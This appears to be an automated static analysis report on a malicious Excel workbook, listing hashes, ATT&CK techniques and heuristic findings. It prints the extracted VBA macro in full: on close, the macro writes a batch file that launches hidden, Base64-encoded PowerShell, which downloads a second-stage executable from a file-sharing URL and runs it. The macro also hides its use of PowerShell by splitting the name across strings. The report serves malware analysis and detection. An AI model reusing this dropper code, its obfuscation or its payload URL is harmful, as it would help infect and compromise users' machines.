Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 995e9fafe57d7228…

MALICIOUS

Office (OOXML)

383.1 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-14
MD5: c905b387d8889b669fbed95a6a252d30 SHA-1: 7faf3a052c5f82e96c8748bce8633a52205ddfca SHA-256: 995e9fafe57d7228634d9acd7035bb4f3462dfff4d2061f78552869952523324
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains VBA macros that use Shell() to execute PowerShell. The PowerShell command is obfuscated using Base64 encoding and is designed to download a second-stage payload from the URL 'http://www.4sync.com/webe/direcDownload/8jRtVQKU/L7oZfgqr.d9af2cbeecb8adcc23ec893'. The macro also attempts to hide its malicious nature by reassembling the 'PowerShell' keyword from split string literals. The document body provides a lure by instructing the user on how to use Excel features, which is a common tactic to encourage macro enablement.

Heuristics 7

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • External hyperlinks (6) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844736
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://go.microsoft.com/fwlink/?linkid=844736 Document hyperlink
    • http://go.microsoft.com/fwlink/?LinkId=844969Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844741Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844732Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844744Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844735Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844725Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844739Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844745Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844751Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844752Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844728Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844750Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844747Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844726Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844746Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844738Document hyperlink
    • http://go.microsoft.com/fwlink/?LinkId=846285Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844749Document hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5651 bytes
SHA-256: c29c471be8a1012465cbcf2bee7e3f4599a378cdc7948afe2fdf8c3732cf7d0f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim enc As String
enc = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBKAHQAYwByAGkAegBsAHIAYQBpAG8AYgB1AG8AcAByAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADQAcwB5AG4AYwAuAGMAbwBtAC8AdwBlAGIALwBkAGkAcgBlAGMAdABEAG8AdwBuAGwAbwBhAGQALwA4AGoAUgB0AFYAUQBLAFUALwBMADcAbwBaAHoAZgBxAHIALgBkADkAYQBmADIAYwBiAGUAZQBiAGMAZAA1AGMAOABhADgAYQBkAGQAYwAyADMAZQAzAGMAYwBlADgAOQAzADMAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA=="
call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
ActiveWorkbook.Save
batch = "Vylxjnypxajbroztle.bat"
Open batch For Output As #1
    Print #1, "start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc
    Close #1
    i = Shell(batch, 0)
End Sub

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub


Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub

Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "1. Add"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "2. Fill"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "3. Split"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "4. Transpose"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "5. Sort & filter"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "6. Tables"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "7. Drop-downs"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribu
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10752 bytes
SHA-256: 3d1bccaed1ed62f4aff4a296175335baaa5b369ef533c930f8be1ecec796a053